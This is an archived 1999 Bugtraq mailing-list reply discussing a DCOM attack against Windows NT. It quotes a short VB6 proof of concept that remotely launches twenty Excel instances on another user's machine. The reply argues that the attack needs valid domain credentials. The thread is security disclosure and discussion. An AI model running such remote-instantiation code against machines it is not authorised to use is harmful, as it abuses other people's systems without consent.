[11462] in bugtraq
Re: FW: DCOM attack against NT using VB6
daemon@ATHENA.MIT.EDU (Max Vision)
Sat Aug 21 08:13:53 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSO.4.10.9908191725380.1649-100000@www.whitehats.com>
Date: Thu, 19 Aug 1999 17:39:02 -0700
Reply-To: Max Vision <vision@WHITEHATS.COM>
From: Max Vision <vision@WHITEHATS.COM>
X-To: "Hargett, Matt" <Matt_Hargett@NAI.COM>, BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <5F6AA2CAD4A4D1119C3D00A0C99D6AC602727DB7@ca-exchange2.nai.com>
Hi,
Did you have credentials to authenticate to your coworker's machines? I
was able to create arbitrary files remotely on other NT machines in my
network using DCOM/Word/Create, but soon discovered that this was because
I had domain admin credentials that were valid for each host. IE, DCOM
attacks aren't effective if you don't have authentication credentials.
If you have contrary information please let us know :) I could be
mistaken, since ISS does a test for non-admin access to DCOM.. What are
the chances ISS/NAI want to give full disclosure on their DCOM compromise
technique?
Required reading:
Understanding the DCOM Wire Protocol by Analyzing Network Data Packets
http://www.guyeddon.com/MSJ3-98.htm
Using Distributed COM with Firewalls
http://www.iapetus.com/dcom/dcomfw.htm
Max Vision
http://maxvision.net/
On Wed, 18 Aug 1999, Hargett, Matt wrote:
> -----Original Message-----
> From: Rob Lempke [mailto:rlempke@ADNET2000.COM]
> Sent: Wednesday, August 11, 1999 1:27 PM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: DCOM attack against NT using VB6
>
>
> Using the code below I was able to create 20 instances of Excel on my
> co-workers machines without modifying their machines at all. The target
> must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
> prevent the attack.
>
> Private Sub Command1_Click()
> Dim xlObj As Object
> Dim xlCollection As New Collection
> Dim i As Long
> For i = 1 To 20
> Set xlObj = CreateObject("Excel.Application", "\\NTBox")
> xlCollection.Add xlObj
> Next i
>
> i = 1
> 'clean up
> While xlCollection.Count > 0
> xlCollection.Remove (xlCollection.Count)
> Wend
> Set xlCollection = Nothing
> End Sub
>
> -Robert E. Lempke
> --------------------------------------------
> Steven Wright one Liners:
> "Black holes are where God divided by zero."
> "Quantum Mechanics: The dreams stuff is made of."
> "Early bird gets the worm, but the second mouse gets the cheese."
> "If everything seems to be going well, you have obviously overlooked
> something."
> "Join the Army, meet interesting people, kill them."
> "Success always occurs in private, and failure in full view."
> "Ambition is a poor excuse for not having enough sense to be lazy."
> "Hard work pays off in the future. Laziness pays off now."
> "Everyone has a photographic memory. Some don't have film."
> "Drink until she's cute, but stop before the wedding."
> --------------------------------------------
>
